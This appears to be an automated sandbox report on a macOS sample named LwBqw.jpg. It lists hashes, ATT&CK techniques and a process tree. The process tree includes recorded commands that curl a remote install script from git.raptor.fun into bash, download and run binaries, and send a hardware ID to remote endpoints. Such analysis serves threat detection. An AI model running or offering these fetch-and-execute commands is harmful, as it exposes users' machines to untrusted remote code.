d564cde82ae8d17fab4c3d0bd7987623320660bf37e69efe0a59fbe50d28cf8e

Analysis

max time kernel
366s
max time network
371s
platform
macos-10.15_amd64
resource
macos-20240711.1-en
resource tags

arch:amd64arch:i386image:macos-20240711.1-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
01/10/2024, 17:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LwBqw.jpg
Size

47KB
MD5

614eb4e7cd4e44143849a87c47f82b53
SHA1

bbb937483e5af6ad14b706445aa1b666df67222a
SHA256

d564cde82ae8d17fab4c3d0bd7987623320660bf37e69efe0a59fbe50d28cf8e
SHA512

acedf2f76e2d5904ce893879c976b7ca91ff4695849eceffd041ec1101417f422eab4bd305d0a4b9e072b4204e4862ba9e55a6f1860b64f968b5fd71fae50bbf
SSDEEP

768:fgixvXgtXSehS8YKZQK2ywtxDzueYo4asyn2Ggsv0XiPutKkUlG7FuxF9:fntaXThvYilTwXnTtn5gQ0vKJl+0D9

Score

7^/10

evasion execution exfiltration

Malware Config

Signatures

Exfiltration Over Alternative Protocol 1 TTPs 4 IoCs

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

exfiltration

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

ioc	Process
curl -s https://git.raptor.fun/main/jq-macos-amd64 -o ./jq	Process not Found
curl -s https://git.raptor.fun/sellix/hwid -o ./hwid	Process not Found
curl -s https://git.raptor.fun/main/jq-macos-amd64 -o ./jq	Process not Found
curl -s https://git.raptor.fun/sellix/hwid -o ./hwid	Process not Found

File Permission 1 TTPs
Adversaries may modify file permissions/attributes to evade access control lists (ACLs) and access protected files.
evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
183	pastebin.com
187	pastebin.com
179	pastebin.com

Resource Forking 1 TTPs 12 IoCs

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

evasion

Resource Forking

T1564.009

ioc	Process
/System/Library/CoreServices/loginwindow.app/Contents/Resources/LWWeeklyMessageTracer	Process not Found
/System/Library/PreferencePanes/Sidecar.prefPane/Contents/Resources/sidecarPrefCheck	Process not Found
/System/Library/PreferencePanes/Wallet.prefPane/Contents/Resources/walletAvailabilityCheckTool	Process not Found
/System/Library/PreferencePanes/ClassroomSettings.prefPane/Contents/Resources/ClassroomSettingsVisibilityCheckTool	Process not Found
/System/Library/PreferencePanes/Sidecar.prefPane/Contents/Resources/sidecarPrefCheck	Process not Found
/System/Library/PreferencePanes/Wallet.prefPane/Contents/Resources/walletAvailabilityCheckTool	Process not Found
"/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Resources/Java Updater.app/Contents/MacOS/Java Updater" -bgcheck	Process not Found
/System/Library/PreferencePanes/ClassroomSettings.prefPane/Contents/Resources/ClassroomSettingsVisibilityCheckTool	Process not Found
/System/Library/PreferencePanes/Profiles.prefPane/Contents/Resources/CPPrefPaneEnabledTool	Process not Found
/System/Library/PreferencePanes/TouchID.prefPane/Contents/Resources/AllowPasswordPref	Process not Found
/System/Library/PreferencePanes/Profiles.prefPane/Contents/Resources/CPPrefPaneEnabledTool	Process not Found
/System/Library/PreferencePanes/TouchID.prefPane/Contents/Resources/AllowPasswordPref	Process not Found

Command and Scripting Interpreter 1 TTPs
Adversaries may abuse Unix shell commands and scripts for execution.
execution

Unix Shell
T1059.004

/usr/libexec/xpcproxy
xpcproxy com.apple.var-db-dslocal-backup
1⤵
PID:482

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/LwBqw.jpg\""
1⤵
PID:483

/usr/bin/xar
/usr/bin/xar -c -f dslocal-backup.xar dslocal
1⤵
PID:482

/usr/libexec/xpcproxy
xpcproxy com.apple.gkreport
1⤵
PID:484

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/LwBqw.jpg\""
1⤵
PID:483

/usr/libexec/gkreport
/usr/libexec/gkreport
1⤵
PID:484

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/LwBqw.jpg
1⤵
PID:483
- /bin/zsh
  /bin/zsh -c /Users/run/LwBqw.jpg
  2⤵
  PID:487
- /Users/run/LwBqw.jpg
  /Users/run/LwBqw.jpg
  2⤵
  PID:487

/usr/libexec/xpcproxy
xpcproxy com.apple.systemstats.daily
1⤵
PID:485

/System/Library/CoreServices/Applications/Feedback Assistant.app/Contents/Library/LaunchServices/seedusaged
"/System/Library/CoreServices/Applications/Feedback Assistant.app/Contents/Library/LaunchServices/seedusaged"
1⤵
PID:472

/System/Library/PrivateFrameworks/SpeechObjects.framework/Versions/A/SpeechDataInstallerd.app/Contents/MacOS/SpeechDataInstallerd
/System/Library/PrivateFrameworks/SpeechObjects.framework/Versions/A/SpeechDataInstallerd.app/Contents/MacOS/SpeechDataInstallerd
1⤵
PID:473

/usr/libexec/pkreporter
/usr/libexec/pkreporter
1⤵
PID:474

/System/Library/CoreServices/loginwindow.app/Contents/Resources/LWWeeklyMessageTracer
/System/Library/CoreServices/loginwindow.app/Contents/Resources/LWWeeklyMessageTracer
1⤵
PID:475

/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Resources/Java Updater.app/Contents/MacOS/Java Updater
"/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Resources/Java Updater.app/Contents/MacOS/Java Updater" -bgcheck
1⤵
PID:476

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.AudioComponentRegistrar
1⤵
PID:513

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
1⤵
PID:513

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.2028
1⤵
PID:514

/Applications/Safari.app/Contents/MacOS/Safari
/Applications/Safari.app/Contents/MacOS/Safari
1⤵
PID:514

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.History
1⤵
PID:515

/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.History.xpc/Contents/MacOS/com.apple.Safari.History
/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.History.xpc/Contents/MacOS/com.apple.Safari.History
1⤵
PID:515

/usr/libexec/xpcproxy
xpcproxy com.apple.WebKit.WebContent.52094781-81C6-476F-8079-05E590413073 514
1⤵
PID:516

/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
1⤵
PID:516

/usr/libexec/xpcproxy
xpcproxy com.apple.SafariLaunchAgent
1⤵
PID:521

/Library/Apple/System/Library/CoreServices/SafariSupport.bundle/Contents/MacOS/SafariLaunchAgent
/Library/Apple/System/Library/CoreServices/SafariSupport.bundle/Contents/MacOS/SafariLaunchAgent
1⤵
PID:521

/usr/libexec/xpcproxy
xpcproxy com.apple.WebKit.WebContent.095E4FE4-605A-4A92-B47A-66E93FCA9D32 514
1⤵
PID:522

/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
1⤵
PID:522

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.SearchHelper 514
1⤵
PID:532

/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.SearchHelper.xpc/Contents/MacOS/com.apple.Safari.SearchHelper
/System/Library/PrivateFrameworks/SafariShared.framework/Versions/A/XPCServices/com.apple.Safari.SearchHelper.xpc/Contents/MacOS/com.apple.Safari.SearchHelper
1⤵
PID:532

/usr/libexec/xpcproxy
xpcproxy com.apple.systempreferences.2140
1⤵
PID:537

/System/Applications/System Preferences.app/Contents/MacOS/System Preferences
"/System/Applications/System Preferences.app/Contents/MacOS/System Preferences"
1⤵
PID:537

/usr/libexec/xpcproxy
xpcproxy com.apple.AccountProfileRemoteViewService 537
1⤵
PID:538

/System/Library/PrivateFrameworks/AOSUI.framework/Versions/A/XPCServices/AccountProfileRemoteViewService.xpc/Contents/MacOS/AccountProfileRemoteViewService
/System/Library/PrivateFrameworks/AOSUI.framework/Versions/A/XPCServices/AccountProfileRemoteViewService.xpc/Contents/MacOS/AccountProfileRemoteViewService
1⤵
PID:538

/System/Library/PreferencePanes/ClassroomSettings.prefPane/Contents/Resources/ClassroomSettingsVisibilityCheckTool
/System/Library/PreferencePanes/ClassroomSettings.prefPane/Contents/Resources/ClassroomSettingsVisibilityCheckTool
1⤵
PID:540

/System/Library/PreferencePanes/Profiles.prefPane/Contents/Resources/CPPrefPaneEnabledTool
/System/Library/PreferencePanes/Profiles.prefPane/Contents/Resources/CPPrefPaneEnabledTool
1⤵
PID:541

/System/Library/PreferencePanes/Sidecar.prefPane/Contents/Resources/sidecarPrefCheck
/System/Library/PreferencePanes/Sidecar.prefPane/Contents/Resources/sidecarPrefCheck
1⤵
PID:542

/System/Library/PreferencePanes/TouchID.prefPane/Contents/Resources/AllowPasswordPref
/System/Library/PreferencePanes/TouchID.prefPane/Contents/Resources/AllowPasswordPref
1⤵
PID:543

/System/Library/PreferencePanes/Wallet.prefPane/Contents/Resources/walletAvailabilityCheckTool
/System/Library/PreferencePanes/Wallet.prefPane/Contents/Resources/walletAvailabilityCheckTool
1⤵
PID:544

/usr/libexec/xpcproxy
xpcproxy com.apple.nfcd
1⤵
PID:545

/usr/libexec/nfcd
/usr/libexec/nfcd
1⤵
PID:545

/usr/libexec/xpcproxy
xpcproxy com.apple.studentd
1⤵
PID:547

/usr/libexec/studentd
/usr/libexec/studentd
1⤵
PID:547

/usr/libexec/xpcproxy
xpcproxy com.apple.preference.keyboard.remoteservice 537
1⤵
PID:548

/System/Library/PreferencePanes/Keyboard.prefPane/Contents/XPCServices/Keyboard.remoteservice.xpc/Contents/MacOS/Keyboard.remoteservice
/System/Library/PreferencePanes/Keyboard.prefPane/Contents/XPCServices/Keyboard.remoteservice.xpc/Contents/MacOS/Keyboard.remoteservice
1⤵
PID:548

/usr/libexec/xpcproxy
xpcproxy com.apple.metadata.mdwrite
1⤵
PID:550

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
1⤵
PID:552

/usr/sbin/spindump
/usr/sbin/spindump
1⤵
PID:552

/usr/libexec/xpcproxy
xpcproxy com.apple.tailspind
1⤵
PID:553

/usr/libexec/tailspind
/usr/libexec/tailspind
1⤵
PID:553

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
1⤵
PID:554

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
1⤵
PID:554

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:555

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:555

/usr/libexec/xpcproxy
xpcproxy com.apple.languageassetd
1⤵
PID:557

/usr/libexec/xpcproxy
xpcproxy com.apple.studentd
1⤵
PID:558

/usr/libexec/xpcproxy
xpcproxy com.apple.sharingd
1⤵
PID:559

/usr/libexec/sharingd
/usr/libexec/sharingd
1⤵
PID:559

/usr/libexec/languageassetd
/usr/libexec/languageassetd
1⤵
PID:557

/usr/libexec/studentd
/usr/libexec/studentd
1⤵
PID:558

/usr/libexec/xpcproxy
xpcproxy com.apple.Spotlight
1⤵
PID:560

/System/Library/CoreServices/Spotlight.app/Contents/MacOS/Spotlight
/System/Library/CoreServices/Spotlight.app/Contents/MacOS/Spotlight
1⤵
PID:560

/usr/libexec/xpcproxy
xpcproxy com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:562

/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:562

/usr/libexec/xpcproxy
xpcproxy com.apple.akd
1⤵
PID:563

/System/Library/PrivateFrameworks/AuthKit.framework/Versions/A/Support/akd
/System/Library/PrivateFrameworks/AuthKit.framework/Versions/A/Support/akd
1⤵
PID:563

/usr/libexec/xpcproxy
xpcproxy com.apple.DictionaryServiceHelper
1⤵
PID:564

/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/XPCServices/com.apple.DictionaryServiceHelper.xpc/Contents/MacOS/com.apple.DictionaryServiceHelper
/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/XPCServices/com.apple.DictionaryServiceHelper.xpc/Contents/MacOS/com.apple.DictionaryServiceHelper
1⤵
PID:564

/usr/libexec/xpcproxy
xpcproxy com.apple.StreamingUnzipService 198
1⤵
PID:568

/System/Library/PrivateFrameworks/StreamingZip.framework/Versions/A/XPCServices/com.apple.StreamingUnzipService.xpc/Contents/MacOS/com.apple.StreamingUnzipService
/System/Library/PrivateFrameworks/StreamingZip.framework/Versions/A/XPCServices/com.apple.StreamingUnzipService.xpc/Contents/MacOS/com.apple.StreamingUnzipService
1⤵
PID:568

/usr/libexec/xpcproxy
xpcproxy com.apple.suggestd
1⤵
PID:572

/usr/libexec/xpcproxy
xpcproxy com.apple.systempreferences.2140
1⤵
PID:573

/System/Applications/System Preferences.app/Contents/MacOS/System Preferences
"/System/Applications/System Preferences.app/Contents/MacOS/System Preferences"
1⤵
PID:573

/usr/libexec/xpcproxy
xpcproxy com.apple.dmd
1⤵
PID:574

/usr/libexec/dmd
/usr/libexec/dmd
1⤵
PID:574

/usr/libexec/xpcproxy
xpcproxy com.apple.AccountProfileRemoteViewService 573
1⤵
PID:575

/System/Library/PrivateFrameworks/AOSUI.framework/Versions/A/XPCServices/AccountProfileRemoteViewService.xpc/Contents/MacOS/AccountProfileRemoteViewService
/System/Library/PrivateFrameworks/AOSUI.framework/Versions/A/XPCServices/AccountProfileRemoteViewService.xpc/Contents/MacOS/AccountProfileRemoteViewService
1⤵
PID:575

/System/Library/PreferencePanes/ClassroomSettings.prefPane/Contents/Resources/ClassroomSettingsVisibilityCheckTool
/System/Library/PreferencePanes/ClassroomSettings.prefPane/Contents/Resources/ClassroomSettingsVisibilityCheckTool
1⤵
PID:576

/System/Library/PreferencePanes/Profiles.prefPane/Contents/Resources/CPPrefPaneEnabledTool
/System/Library/PreferencePanes/Profiles.prefPane/Contents/Resources/CPPrefPaneEnabledTool
1⤵
PID:577

/System/Library/PreferencePanes/Sidecar.prefPane/Contents/Resources/sidecarPrefCheck
/System/Library/PreferencePanes/Sidecar.prefPane/Contents/Resources/sidecarPrefCheck
1⤵
PID:578

/System/Library/PreferencePanes/TouchID.prefPane/Contents/Resources/AllowPasswordPref
/System/Library/PreferencePanes/TouchID.prefPane/Contents/Resources/AllowPasswordPref
1⤵
PID:579

/System/Library/PreferencePanes/Wallet.prefPane/Contents/Resources/walletAvailabilityCheckTool
/System/Library/PreferencePanes/Wallet.prefPane/Contents/Resources/walletAvailabilityCheckTool
1⤵
PID:580

/System/Library/PrivateFrameworks/CoreSuggestions.framework/Versions/A/Support/suggestd
/System/Library/PrivateFrameworks/CoreSuggestions.framework/Versions/A/Support/suggestd
1⤵
PID:572

/usr/libexec/xpcproxy
xpcproxy com.apple.preference.keyboard.remoteservice 573
1⤵
PID:581

/System/Library/PreferencePanes/Keyboard.prefPane/Contents/XPCServices/Keyboard.remoteservice.xpc/Contents/MacOS/Keyboard.remoteservice
/System/Library/PreferencePanes/Keyboard.prefPane/Contents/XPCServices/Keyboard.remoteservice.xpc/Contents/MacOS/Keyboard.remoteservice
1⤵
PID:581

/usr/libexec/xpcproxy
xpcproxy com.apple.systempreferences.cacheAssistant
1⤵
PID:582

/System/Library/Frameworks/PreferencePanes.framework/Versions/A/XPCServices/cacheAssistant.xpc/Contents/MacOS/cacheAssistant
/System/Library/Frameworks/PreferencePanes.framework/Versions/A/XPCServices/cacheAssistant.xpc/Contents/MacOS/cacheAssistant
1⤵
PID:582

/usr/libexec/xpcproxy
xpcproxy com.apple.Safari.SafeBrowsing.Service
1⤵
PID:589

/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service
/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service
1⤵
PID:589

/usr/libexec/xpcproxy
xpcproxy com.apple.WebKit.WebContent.2CE8F765-26E6-435E-9F40-9181EF37235D 514
1⤵
PID:590

/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
1⤵
PID:590

/usr/libexec/xpcproxy
xpcproxy com.apple.Terminal.2100
1⤵
PID:592

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
1⤵
PID:592
- /usr/bin/login
  login -pf run
  2⤵
  PID:593
- - /bin/zsh
    -zsh
    3⤵
    PID:594
  - - /usr/libexec/path_helper
      /usr/libexec/path_helper -s
      4⤵
      PID:595
  - - /usr/bin/locale
      locale LC_CTYPE
      4⤵
      PID:596
  - - /usr/bin/curl
      curl -s https://git.raptor.fun/main/install.sh
      4⤵
      PID:598
  - - /bin/bash
      bash
      4⤵
      PID:599
    - - /usr/bin/clear
        
        clear
        5⤵
        
        PID:601
    - - /usr/bin/curl
        
        curl -s https://git.raptor.fun/main/jq-macos-amd64 -o ./jq
        5⤵
        
        PID:602
    - - /bin/chmod
        
        chmod +x ./jq
        5⤵
        
        PID:603
    - - /usr/bin/curl
        
        curl -s https://git.raptor.fun/sellix/hwid -o ./hwid
        5⤵
        
        PID:604
    - - /bin/chmod
        
        chmod +x ./hwid
        5⤵
        
        PID:605
    - - ./hwid
        
        ./hwid
        5⤵
        
        PID:606
    - - /usr/bin/curl
        
        curl -s "https://git.raptor.fun/api/whitelist?hwid=c595292c954b45f28c9c770dd18edbd00ba39891"
        5⤵
        
        PID:607
    - - /bin/rm
        
        rm ./hwid
        5⤵
        
        PID:611
    - - /usr/bin/curl
        
        curl -s "https://git.raptor.fun/api/sellix?key=EG&hwid=c595292c954b45f28c9c770dd18edbd00ba39891"
        5⤵
        
        PID:612
    - - /bin/rm
        
        rm ./jq
        5⤵
        
        PID:613
  - - /usr/bin/curl
      curl -s https://git.raptor.fun/main/install.sh
      4⤵
      PID:616
  - - /bin/bash
      bash
      4⤵
      PID:617
    - - /usr/bin/clear
        
        clear
        5⤵
        
        PID:619
    - - /usr/bin/curl
        
        curl -s https://git.raptor.fun/main/jq-macos-amd64 -o ./jq
        5⤵
        
        PID:620
    - - /bin/chmod
        
        chmod +x ./jq
        5⤵
        
        PID:621
    - - /usr/bin/curl
        
        curl -s https://git.raptor.fun/sellix/hwid -o ./hwid
        5⤵
        
        PID:622
    - - /bin/chmod
        
        chmod +x ./hwid
        5⤵
        
        PID:623
    - - ./hwid
        
        ./hwid
        5⤵
        
        PID:624
    - - /usr/bin/curl
        
        curl -s "https://git.raptor.fun/api/whitelist?hwid=c595292c954b45f28c9c770dd18edbd00ba39891"
        5⤵
        
        PID:625
    - - /bin/rm
        
        rm ./hwid
        5⤵
        
        PID:629
    - - /usr/bin/curl
        
        curl -s "https://git.raptor.fun/api/sellix?key=4T43T&hwid=c595292c954b45f28c9c770dd18edbd00ba39891"
        5⤵
        
        PID:630
    - - /bin/rm
        
        rm ./jq
        5⤵
        
        PID:631

/usr/libexec/xpcproxy
xpcproxy com.apple.passd
1⤵
PID:597

/System/Library/PrivateFrameworks/PassKitCore.framework/passd
/System/Library/PrivateFrameworks/PassKitCore.framework/passd
1⤵
PID:597

./jq
./jq -r .success
1⤵
PID:610

/usr/libexec/xpcproxy
xpcproxy com.apple.bird
1⤵
PID:615

/System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
/System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
1⤵
PID:615

./jq
./jq -r .success
1⤵
PID:628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Unix Shell

T1059.004

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hide Artifacts

T1564

Resource Forking

T1564.009

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Exfiltration Over Alternative Protocol

T1048